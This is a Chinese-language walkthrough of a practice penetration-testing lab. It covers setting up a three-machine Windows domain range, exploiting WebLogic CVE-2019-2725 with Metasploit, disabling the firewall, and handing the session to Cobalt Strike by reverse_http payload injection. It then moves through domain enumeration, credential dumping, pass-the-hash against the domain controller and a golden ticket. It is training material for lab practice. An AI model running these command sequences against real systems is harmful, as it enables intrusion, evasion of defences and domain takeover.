环境搭建

三台机器的密码:1qaz@WSX

域账号密码:administrator:1qaz@WSX

和红日靶场-1实验环境配置一致,我们首先将我们的VMnet1的网卡改成10.10.10.0网段,如下所示

image-20241117153451383

即我们的内网网段是10.10.10.0,外网机器,即我们的DMZ区域我们配置VMnet8网卡,以保证能和我们的主机进行通信,即连接到我们的外网

web服务器

我们的web服务器网络配置如下图所示

image-20241117153850115

我们为其配置两张网卡以保障其作为DMZ区域机的功能,同时我们登录进去,将IP外网网段修改为192.168.20.0,因为计算机默认是192.168.111.0,如下所示

image-20241118001646994

我们尝试ping内外网两台主机,如果可以ping通,则代表我们的网卡配置正确,如果ping不通,则我们还需要再设置,如下所示

image-20241118001956476

我们可以ping通,接下来我们开启web服务器上的web服务即可,我们首先进入如下目录C:\Oracle\Middleware\user_projects\domains\base_domain\bin,如下所示

image-20241118002258712

之后我们分别右键,以管理员权限执行setDomainENV、startManageWeblogic、startWeblogic,如下所示

image-20241118002555705

至此我们web服务器已经搭建完毕,当我们访问http://192.168.20.80:7001/console,出现如下界面则代表我们web服务启动成功

image-20241118002930023

PC

我们的PC机也具有两张网卡,配置方式和web服务器网卡配置方式一致,如下所示

image-20241118000316547

PC机修改IP,如下所示,修改对应网段为20即可

image-20241118003325200

image-20241118003542864

DC域控

我们设置vmnet1网卡,单网卡代表内网,IP为10.10.10.10,如下所示

image-20241118003656924

所以我们可以列出下面的表格

服务器 外网IP 内网IP
WEB 192.168.20.80 10.10.10.80
PC 192.168.20.201 10.10.10.201
DC 10.10.10.10

至此我们的环境全部搭建完成

外网边界探测

我们首先先用kali扫一下全网段,使用arp-scan -l命令即可,如下所示

image-20241118083014089

由于192.168.20.130是我的另一台Windows虚拟机的IP,所以我们这里的靶机IP是192.168.20.80,符合我们的前期设置,之后我们用nmap进行扫描,开放的端口如下所示

image-20241118083307709

我们这里尝试访问一下80端口

image-20241118083512992

我们可以发现没有任何东西,即我们这里开放了80端口,但是没有在80端口开启web服务,我们这里尝试用fscan帮我们进行漏洞探测,如下所示

image-20241118083746619

我们这里发现fscan帮我们探测出来7001端口,而且帮我们探测出来是weblogic服务,且告诉我们使用cve-2019-2725,我们去网上搜索一下这个cve如何利用

CVE-2019-2725

我们这里选择使用msf进行一把梭漏洞利用,我们首先在kali中执行msfconsole,如下所示

image-20241118084657727

只有我们依次执行以下命令

search cve-2019-2725
use 0
set target 1
show options
set rhosts 192.168.20.80
set lhost 192.168.20.138
run

image-20241118093143870

我们这里成功的利用到了这个漏洞,我们这边可以直接进行操作,首先我们进行一个防火墙关闭,我们执行如下命令关闭我们的防火墙

netsh firewall set opmode mode=disable

我们在操作的过程会被突然断联,所以我们这里还是首先将进程进行迁移,防止主机将我们的进程杀掉,如下所示

image-20241118113453818

我们在查看进程的过程中看到了360主动防御,我们肯定把这个进程杀掉

image-20241118113827864

我们直接kill,但是发现没有权限,我们这里getsystem一下

image-20241118114135281

还是杀不掉,我们这里只能先不管他了,但是我们ipconfig一下可以看到其内网IP为10.10.10.80

image-20241118114337984

我们这里再收集一下域内信息,但是这里一直显示乱码,所以我决定通过cs来收集域内信息,我们先上线CS

CS上线

我们在kali启动我们的cs服务器,如下所示

image-20241118144123788

密码随便设置即可

我们在msf处退出当前会话,我们输入background命令即可将当前会话保留,我们选用另一个模块,如下所示

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.20.138
set lport 8888
set session 1 #根据自己上一个会话ID来

image-20241118145340723

之后我们去cs客户端开一个监听,如下所示

image-20241118150148906

记得配置的端口要和我们的msf一致,配置好后我们msf直接run起来,如下所示

image-20241118151915702

我们成功监听到msf上的session,我们接下来进行域内信息收集

内网渗透

域内信息收集

我们首先将延迟降低,因为我们这是靶场环境,所以延迟低一点不会怎么样,我们将延迟讲成0s,如下所示

image-20241118152141519

然后我们执行net view命令,扫一下主机数

image-20241118152636186

我们发现执行不了这个命令,我们尝试以下流程去收集域内信息,如下所示

ipconfig /all

image-20241118184414166

image-20241118184429646

我们这里收集到的信息有主机名称WEB,主域名de1ay.com,默认网关10.10.10.1,DNS服务器10.10.10.10,我们接下来查询域内用户

net user /domain    #查询域内用户

055570856d82a0586fc6d72a66c51bf3

这里我们可以知道域内存在另一个域内用户krbtgt,我们接下来查询域内管理员,使用如下命令

net group "domain admins" /domain   #查看域管理员用户

image-20241118185911262

所以我们的域管理员用户就是administrator,接着我们查看域控主机,使用如下命令查看域控主机

net group "domain controllers" /domain     #查看域控:

image-20241118190122102

所以我们的域控主机为DC,我们尝试ping一下域控主机以确定IP,如下所示

image-20241118190251355

从这里我们可以看出我们的域控主机IP是10.10.10.10,当我们信息收集到这的时候,突然去看了一下在线主机,然后发现cs已经给我自动收集好了,我真的服了,为什么之前net view的时候一直出不来,现在我收集完了出来了

image-20241118191408595

所以这就是我们内网的一个架构,我们接下来试着去横向移动,那道域控的控制权

横向移动

我们首先扫描一下10.10.10.10开放的端口,如下所示

image-20241118191622789

我们发现开放了445端口,所以我们这里尝试使用哈希传递攻击,和靶场一步骤一致,我们首先抓取一下明文密码

image-20241118191857029

我们的明文密码就是1qaz@WSX,我们接下来创建SMB监听器,如下所示

image-20241118192018075

之后我们尝试对DC进行哈希传递攻击,我们选择如下所示

image-20241118192743798

image-20241118192821130

点击运行后我们即可拿下域控,如下所示

image-20241118192854393

黄金票据

接下来创建黄金票据,具体讲解可见红日靶场1,我们获取SID值及krbtgt票据就可以成功创建属于我们自己的黄金票据

image-20241118194055329

我们这里成功创建了我们的黄金票据,后续的痕迹清理就不在此演示

总结

这次的靶场稍微简单一点,主要考的是msf和cs的联动,但是太卡了,cs不知道为啥一会就闪退,导致做了很久才做完,总体难度不大,考的还是哈希传递攻击,还是需要加快速度,msf有些东西还不是很熟练